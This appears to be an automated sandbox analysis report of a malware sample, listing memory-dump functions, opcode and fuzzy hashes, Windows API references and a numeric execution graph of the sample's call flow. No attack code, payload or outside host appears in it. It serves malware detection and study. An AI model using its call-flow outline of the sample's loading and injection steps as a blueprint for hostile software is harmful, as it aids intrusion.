                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070032798.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_52c0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: Timer
                                                                                    • String ID:
                                                                                    • API String ID: 2870079774-0
                                                                                    • Opcode ID: 0df235615d5d11c2a68c2a5a7c3a52c58058b0f2e2c03e9d2ce83ecd9758d81e
                                                                                    • Instruction ID: e4198c37183f99ac6b8183b36c30cb0937e563388efe522d45f6614e54a3a24d
                                                                                    • Opcode Fuzzy Hash: 0df235615d5d11c2a68c2a5a7c3a52c58058b0f2e2c03e9d2ce83ecd9758d81e
                                                                                    • Instruction Fuzzy Hash: 4611E0B59103499FCB10DF9AD989BDEBFF8EB48310F10845AE919A7201C375A944CFA5
                                                                                    Function 0BFA0314 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0BFA16C7), ref: 0BFA223D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072603751.000000000BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_bfa0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatchMessage
                                                                                    • String ID:
                                                                                    • API String ID: 2061451462-0
                                                                                    • Opcode ID: 31490d3e1f38bde4b4c7d7fc2d20a0f99616844b2635261b13c29207b56d519f
                                                                                    • Instruction ID: b03cad1e0266c21daae45753cfc93da236691ca094b3ed5224663c084c37e869
                                                                                    • Opcode Fuzzy Hash: 31490d3e1f38bde4b4c7d7fc2d20a0f99616844b2635261b13c29207b56d519f
                                                                                    • Instruction Fuzzy Hash: D81110B1D006498FCB10DF9AD848B9EFBF4EB88314F10845AE519B3200C378A544CFA5
                                                                                    Function 0BFA21D9 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0BFA16C7), ref: 0BFA223D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072603751.000000000BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_bfa0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatchMessage
                                                                                    • String ID:
                                                                                    • API String ID: 2061451462-0
                                                                                    • Opcode ID: e63261839d8ad84da608d565623b8a76e4536c4d4a3cb605a7f95657585f182f
                                                                                    • Instruction ID: 7622c321876899aeb3ca1e7ccd06b58ec24023541156b400ace3c93caab0e4c0
                                                                                    • Opcode Fuzzy Hash: e63261839d8ad84da608d565623b8a76e4536c4d4a3cb605a7f95657585f182f
                                                                                    • Instruction Fuzzy Hash: 2611FEB5C046498FCB20DF9AE988BDEFBF8EB88314F10845AD459B3200C378A545CFA5
                                                                                    Function 058B7F5E Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
                                                                                    • Opcode ID: 2c3a8d5c9702951795a3944798ddd8832ed9d0a5bc3438fac1b438c298669fdc
                                                                                    • Instruction ID: 78ad5eaf53ee58b956979f24c267b101ab1a57b5a0946dd201c6781da80fbbcd
                                                                                    • Opcode Fuzzy Hash: 2c3a8d5c9702951795a3944798ddd8832ed9d0a5bc3438fac1b438c298669fdc
                                                                                    • Instruction Fuzzy Hash: B4014BB1D003098EDB14DBA9D4443EEFBF5AF84325F24881AD51AE7340CB789545CB91
                                                                                    Function 010AD4C4 Relevance: .1, Instructions: 75COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2055445369.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10ad000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bf0be5d6cbd7e348d9389139f590e9a67f9b9a23074e8cd79353ecee54d2b86a
                                                                                    • Instruction ID: e76d0491e89235389dff7b2468e656f30a9427c6ee27ad5ea721d770600e2aef
                                                                                    • Opcode Fuzzy Hash: bf0be5d6cbd7e348d9389139f590e9a67f9b9a23074e8cd79353ecee54d2b86a
                                                                                    • Instruction Fuzzy Hash: 942167B1500240DFDB01DFA8D9C0B2ABFA5FB88318F64C5ADE8890B656C336D416CBA1
                                                                                    Function 010AD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2055445369.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10ad000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 64a61eeefc995145e1754faadb564cd6ec5cd4319d0044f39a6f3c4b33a3e19f
                                                                                    • Instruction ID: d46794f7c10daa1761c25171bf2373d3f9035068353c9b7314cd24cabb8719d6
                                                                                    • Opcode Fuzzy Hash: 64a61eeefc995145e1754faadb564cd6ec5cd4319d0044f39a6f3c4b33a3e19f
                                                                                    • Instruction Fuzzy Hash: C02148B1500200DFDB01DF88D9C0B5ABFA5FB88314F64C5ADE9490B656C736E416C7A1
                                                                                    Function 010BD01C Relevance: .1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2055490245.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10bd000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7c679c7ab4ed57d226e5c79e4991951ddf490183f25ae99aa740e0350919c20e
                                                                                    • Instruction ID: 39e2e694ad5667fd1b1bad1e1679e5304d968e77c289ccfadf12fff4d3908f87
                                                                                    • Opcode Fuzzy Hash: 7c679c7ab4ed57d226e5c79e4991951ddf490183f25ae99aa740e0350919c20e
                                                                                    • Instruction Fuzzy Hash: 28212571514200DFDB15DF98D5C0B16FFA5EB84318F24C5ADE98A0B246C33AD407CB61
                                                                                    Function 010BD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2055490245.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10bd000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a68fe2b7e65d957033c162a2f510e9c6689df989e2aa965312fb98bf57929842
                                                                                    • Instruction ID: 9666f81c492227893b1f46d6028043274f06e6da3ecc41c837f93a77c1feecab
                                                                                    • Opcode Fuzzy Hash: a68fe2b7e65d957033c162a2f510e9c6689df989e2aa965312fb98bf57929842
                                                                                    • Instruction Fuzzy Hash: F82129B1504280EFDB05DF98D5C0B65FBA5FB94328F24C5ADD9894B252C336D806CB61
                                                                                    Function 010BD006 Relevance: .1, Instructions: 63COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2055490245.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10bd000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c2cd603f8b6a55ccf99710e11338c2c3144d0d467e7fa963f1be31cfdf377784
                                                                                    • Instruction ID: 3711cb18a6ee11a23c9aba66afd93510e7b01b75f10fa577006f0fa756699688
                                                                                    • Opcode Fuzzy Hash: c2cd603f8b6a55ccf99710e11338c2c3144d0d467e7fa963f1be31cfdf377784
                                                                                    • Instruction Fuzzy Hash: BC2183755083809FCB02CF54D9D4711BFB1EB46214F28C5DAD8898F2A7C33A9816CB62
                                                                                    Function 010AD3D3 Relevance: .1, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2055445369.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10ad000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                                    • Instruction ID: 75eb928ffedfc2744cb78c86008f5b1617b80f160b4bef093a7e25fe052785da
                                                                                    • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                                    • Instruction Fuzzy Hash: 03110376404240CFDB02CF84D5C4B56BFB1FB84324F24C2A9D9490B657C33AE45ACBA1
                                                                                    Function 010AD4BF Relevance: .1, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2055445369.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10ad000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                                    • Instruction ID: 25430ab47abad814c5ee73e752b545cd22c28d0650cde90cc3f96b5cb5832a51
                                                                                    • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                                    • Instruction Fuzzy Hash: 83110372804280CFCB02CF54D5C4B1ABFB1FB84314F24C6A9D8890B657C336D45ACBA1
                                                                                    Function 010BD1CF Relevance: .1, Instructions: 53COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2055490245.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10bd000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                                    • Instruction ID: c02be47bc4b8ee2953e416de4d82ae3f56a66b80fe3eb05d0ea900f565358b17
                                                                                    • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                                    • Instruction Fuzzy Hash: 1211BB75904280DFDB02CF54D5C4B15FFA1FB84228F24C6A9D8894B696C33AD80ACB61

                                                                                    Non-executed Functions

                                                                                    Function 0BFA4228 Relevance: 5.3, Strings: 4, Instructions: 265COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072603751.000000000BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_bfa0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $(&cq$(gq$Hgq
                                                                                    • API String ID: 0-2835895591
                                                                                    • Opcode ID: 75d145cc1ad089e277f52f25c37008a82af3bdca29773f7fd5c9bc5b2924f7b1
                                                                                    • Instruction ID: d9335bb4bdd500abedc18d5646739b75fedd0a7a716a9b0b349c4952823541e1
                                                                                    • Opcode Fuzzy Hash: 75d145cc1ad089e277f52f25c37008a82af3bdca29773f7fd5c9bc5b2924f7b1
                                                                                    • Instruction Fuzzy Hash: 649183B1F002199FDB18DF79C8545AFBAF6EF88710F108529E405EB350DB749905CBA0
                                                                                    Function 0BFA9E38 Relevance: 2.0, Strings: 1, Instructions: 707COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072603751.000000000BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_bfa0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: fff?
                                                                                    • API String ID: 0-4136771917
                                                                                    • Opcode ID: 7e666fd4e4560eaef2e17eaf4418967c4dc34509506d7bfca69811c872e8d41d
                                                                                    • Instruction ID: bb5bbd0f6bce55aeadc3bc57aaf684318595a593edb9f88eddd94a5940bfcdaf
                                                                                    • Opcode Fuzzy Hash: 7e666fd4e4560eaef2e17eaf4418967c4dc34509506d7bfca69811c872e8d41d
                                                                                    • Instruction Fuzzy Hash: 6362283681061ADFCF15DF50C884AD9B7B2FF99300F158695E9086B161E772AADACF80
                                                                                    Function 058B6468 Relevance: .3, Instructions: 312COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f1f025d396836bedf25391717f4a7ceeec4c605ed2fadcb25d6243860a791c58
                                                                                    • Instruction ID: d9fbe5f17fba0bbee700b088b5a797df77b080d967fec6e7b09b7d6c7537b3fa
                                                                                    • Opcode Fuzzy Hash: f1f025d396836bedf25391717f4a7ceeec4c605ed2fadcb25d6243860a791c58
                                                                                    • Instruction Fuzzy Hash: DCE1F874E042199FDB14DFA9C5809AEFBF2BF89304F248169D814AB356D770AD42CFA1
                                                                                    Function 058B80B8 Relevance: .3, Instructions: 312COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 306b268a6b09a62d4dc0a9b7e07ba251afca53804898374c9586dcd763136a39
                                                                                    • Instruction ID: e6eb39b853e8f79ac14f92d1d2a97870315be63f0f9b6d45e7a8d591fd118375
                                                                                    • Opcode Fuzzy Hash: 306b268a6b09a62d4dc0a9b7e07ba251afca53804898374c9586dcd763136a39
                                                                                    • Instruction Fuzzy Hash: 2BE11674E042199FDB14DFA8C5809AEFBB6FF89304F24816AD814AB355D770AD82CF61
                                                                                    Function 058B6030 Relevance: .3, Instructions: 312COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 277514a9e6c7340defb4b0a64c9d2084caed250a80a179a007161e0c4f6e3886
                                                                                    • Instruction ID: 51a3e8f9fede668c1961d289d448139d4b19cc5530c41019865aae695f539652
                                                                                    • Opcode Fuzzy Hash: 277514a9e6c7340defb4b0a64c9d2084caed250a80a179a007161e0c4f6e3886
                                                                                    • Instruction Fuzzy Hash: FBE11574E042199FDB14DFA9C5809AEFBB2BF89304F248169D815AB356D730AD82CF61
                                                                                    Function 058B68A0 Relevance: .3, Instructions: 312COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c6d77606c669eef93595bf50d5aaeed5ac0ed4744ce08a3a053e791c4235f3f3
                                                                                    • Instruction ID: 8673ae0320fd96638f9e51b7b681ac1f55692a39cbf90d7720a16b2bae697bb5
                                                                                    • Opcode Fuzzy Hash: c6d77606c669eef93595bf50d5aaeed5ac0ed4744ce08a3a053e791c4235f3f3
                                                                                    • Instruction Fuzzy Hash: 33E106B4E042199FDB14DFA9C5809AEFBB2FF89304F248169D814AB355D770AD82CF61
                                                                                    Function 058B5BF8 Relevance: .3, Instructions: 312COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c84b8ee80157a9ed8098ccc3e3825a10c075a7fbc574354c4c016b800e2127b0
                                                                                    • Instruction ID: 45d9e8a5037d06d55c0684f542f5b31df7988b8d88249480e6e16c469bb6c57b
                                                                                    • Opcode Fuzzy Hash: c84b8ee80157a9ed8098ccc3e3825a10c075a7fbc574354c4c016b800e2127b0
                                                                                    • Instruction Fuzzy Hash: F8E11774E042199FDB14DFA9C5809AEFBB2FF88304F248169D814AB356D771AD42CFA1
                                                                                    Function 052C3C79 Relevance: .3, Instructions: 271COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070032798.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_52c0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 64e62d3da3ff34b3d33274ec5e417f3b206617d90905661b92856c0f301d8b1a
                                                                                    • Instruction ID: adf80295be0790b30ffb41b6149743de70867422e146f6b63de526cb27a01436
                                                                                    • Opcode Fuzzy Hash: 64e62d3da3ff34b3d33274ec5e417f3b206617d90905661b92856c0f301d8b1a
                                                                                    • Instruction Fuzzy Hash: BAD10931D20B5A8BCB10EFA4D994A99B771FF95300F60DB9AE40937214EB706AC5CB91
                                                                                    Function 052C3C88 Relevance: .3, Instructions: 264COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070032798.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_52c0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: af7d22e91ed24f4e18c6c59096c8704f00a713834e459eced0c0ab76bee60ce5
                                                                                    • Instruction ID: 8e9cda9d433a991eeb6b168c850816a0d19fd5aa510b3dcaf7dea8132d1bc7b4
                                                                                    • Opcode Fuzzy Hash: af7d22e91ed24f4e18c6c59096c8704f00a713834e459eced0c0ab76bee60ce5
                                                                                    • Instruction Fuzzy Hash: 52D1F931D20B5A8BCB10EFA4D994A99B771FF95300F60DB9AE40937214EB706AC5CB91
                                                                                    Function 058B2C90 Relevance: .1, Instructions: 100COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3344034a5d330ede46489deb998745c295243709bb1817a6d78e3c6c648f4275
                                                                                    • Instruction ID: 393c0b7f70b2d5ae7d460fe7de2754b1dba9ac50d1ac866b24da339b33eb3ebc
                                                                                    • Opcode Fuzzy Hash: 3344034a5d330ede46489deb998745c295243709bb1817a6d78e3c6c648f4275
                                                                                    • Instruction Fuzzy Hash: CF41F7B0D0461DCBEB58CF9AC8457EEFAFABF89300F04C56AD409A6254DBB40985CF50
                                                                                    Function 058B2CA0 Relevance: .1, Instructions: 96COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b75f2d5cf801212279af81e4348bd88a4d757997bda3d9ffec65d13caf1762b8
                                                                                    • Instruction ID: cd973b351c62b70f1161f439c8f6098a2d99e4b86e2910fafc6a118f6663f130
                                                                                    • Opcode Fuzzy Hash: b75f2d5cf801212279af81e4348bd88a4d757997bda3d9ffec65d13caf1762b8
                                                                                    • Instruction Fuzzy Hash: 3D41E7B4D0461DCBEB58CF9AC8447EEFAFABF88304F04C56AD809A6254DBB40985CF50

                                                                                    Execution Graph

                                                                                    Execution Coverage:1.2%
                                                                                    Dynamic/Decrypted Code Coverage:5.1%
                                                                                    Signature Coverage:8.8%
                                                                                    Total number of Nodes:137
                                                                                    Total number of Limit Nodes:11
                                                                                    execution_graph 92039 424b23 92040 424b3f 92039->92040 92041 424b67 92040->92041 92042 424b7b 92040->92042 92043 42c893 NtClose 92041->92043 92049 42c893 92042->92049 92045 424b70 92043->92045 92046 424b84 92052 42ea93 RtlAllocateHeap 92046->92052 92048 424b8f 92050 42c8b0 92049->92050 92051 42c8c1 NtClose 92050->92051 92051->92046 92052->92048 92168 42be73 92169 42be90 92168->92169 92172 58c2df0 LdrInitializeThunk 92169->92172 92170 42beb8 92172->92170 92173 42fa13 92174 42fa23 92173->92174 92175 42fa29 92173->92175 92178 42ea53 92175->92178 92177 42fa4f 92181 42cbd3 92178->92181 92180 42ea6e 92180->92177 92182 42cbf0 92181->92182 92183 42cc01 RtlAllocateHeap 92182->92183 92183->92180 92184 424eb3 92189 424ecc 92184->92189 92185 424f5c 92186 424f17 92187 42e973 RtlFreeHeap 92186->92187 92188 424f27 92187->92188 92189->92185 92189->92186 92190 424f57 92189->92190 92191 42e973 RtlFreeHeap 92190->92191 92191->92185 92053 4141e3 92054 4141fd 92053->92054 92059 417983 92054->92059 92056 41421b 92057 414260 92056->92057 92058 41424f PostThreadMessageW 92056->92058 92058->92057 92061 4179a7 92059->92061 92060 4179ae 92060->92056 92061->92060 92062 4179e3 LdrLoadDll 92061->92062 92063 4179fa 92061->92063 92062->92063 92063->92056 92064 41b4a3 92065 41b4e7 92064->92065 92066 41b508 92065->92066 92067 42c893 NtClose 92065->92067 92067->92066 92192 41a733 92193 41a74b 92192->92193 92195 41a7a5 92192->92195 92193->92195 92196 41e673 92193->92196 92197 41e699 92196->92197 92201 41e790 92197->92201 92202 42fb43 92197->92202 92199 41e72e 92200 42bec3 LdrInitializeThunk 92199->92200 92199->92201 92200->92201 92201->92195 92203 42fab3 92202->92203 92204 42fb10 92203->92204 92205 42ea53 RtlAllocateHeap 92203->92205 92204->92199 92206 42faed 92205->92206 92207 42e973 RtlFreeHeap 92206->92207 92207->92204 92068 4019a4 92069 4019bc 92068->92069 92072 42fee3 92069->92072 92075 42e533 92072->92075 92076 42e559 92075->92076 92087 407123 92076->92087 92078 42e56f 92079 401aaa 92078->92079 92090 41b2b3 92078->92090 92081 42e58e 92082 42e5a3 92081->92082 92105 42cc73 92081->92105 92101 428403 92082->92101 92085 42e5bd 92086 42cc73 ExitProcess 92085->92086 92086->92079 92108 416643 92087->92108 92089 407130 92089->92078 92091 41b2df 92090->92091 92132 41b1a3 92091->92132 92094 41b324 92096 41b340 92094->92096 92099 42c893 NtClose 92094->92099 92095 41b30c 92097 41b317 92095->92097 92098 42c893 NtClose 92095->92098 92096->92081 92097->92081 92098->92097 92100 41b336 92099->92100 92100->92081 92102 428465 92101->92102 92104 428472 92102->92104 92143 4187f3 92102->92143 92104->92085 92106 42cc8d 92105->92106 92107 42cc9e ExitProcess 92106->92107 92107->92082 92109 41665a 92108->92109 92111 416673 92109->92111 92112 42d313 92109->92112 92111->92089 92114 42d32d 92112->92114 92113 42d35c 92113->92111 92114->92113 92119 42bec3 92114->92119 92120 42bee0 92119->92120 92126 58c2c0a 92120->92126 92121 42bf0c 92123 42e973 92121->92123 92129 42cc23 92123->92129 92125 42d3cf 92125->92111 92127 58c2c1f LdrInitializeThunk 92126->92127 92128 58c2c11 92126->92128 92127->92121 92128->92121 92130 42cc40 92129->92130 92131 42cc51 RtlFreeHeap 92130->92131 92131->92125 92133 41b299 92132->92133 92134 41b1bd 92132->92134 92133->92094 92133->92095 92138 42bf63 92134->92138 92137 42c893 NtClose 92137->92133 92139 42bf80 92138->92139 92142 58c35c0 LdrInitializeThunk 92139->92142 92140 41b28d 92140->92137 92142->92140 92145 41881d 92143->92145 92144 418d1b 92144->92104 92145->92144 92151 413e53 92145->92151 92147 41894a 92147->92144 92148 42e973 RtlFreeHeap 92147->92148 92149 418962 92148->92149 92149->92144 92150 42cc73 ExitProcess 92149->92150 92150->92144 92155 413e73 92151->92155 92153 413edc 92153->92147 92154 413ed2 92154->92147 92155->92153 92156 41b5c3 RtlFreeHeap LdrInitializeThunk 92155->92156 92156->92154 92208 418f35 92209 42c893 NtClose 92208->92209 92210 418f3f 92209->92210 92157 413ce8 92158 413cf2 92157->92158 92159 413c86 92157->92159 92162 42cb33 92159->92162 92163 42cb4d 92162->92163 92166 58c2c70 LdrInitializeThunk 92163->92166 92164 413c92 92166->92164 92167 58c2b60 LdrInitializeThunk

                                                                                    Executed Functions

                                                                                    Function 00417983 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 62 417983-4179ac call 42f553 65 4179b2-4179c0 call 42fb53 62->65 66 4179ae-4179b1 62->66 69 4179d0-4179e1 call 42e003 65->69 70 4179c2-4179cd call 42fdf3 65->70 75 4179e3-4179f7 LdrLoadDll 69->75 76 4179fa-4179fd 69->76 70->69 75->76
                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004179F5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Load
                                                                                    • String ID:
                                                                                    • API String ID: 2234796835-0
                                                                                    • Opcode ID: f729aad71b325cdb97dbeb40763933413b5d6b7fb509c19989d913dea0fc555e
                                                                                    • Instruction ID: 12297fcb8eb2aa2b345c5072c49cf750d2dc109e2fa89848fb1b39229960a16f
                                                                                    • Opcode Fuzzy Hash: f729aad71b325cdb97dbeb40763933413b5d6b7fb509c19989d913dea0fc555e
                                                                                    • Instruction Fuzzy Hash: 9F0175B5E0010DB7DF10DBE5DC42FDEB7789B14308F4081A6E90897240F678EB488795
                                                                                    Function 0042C893 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
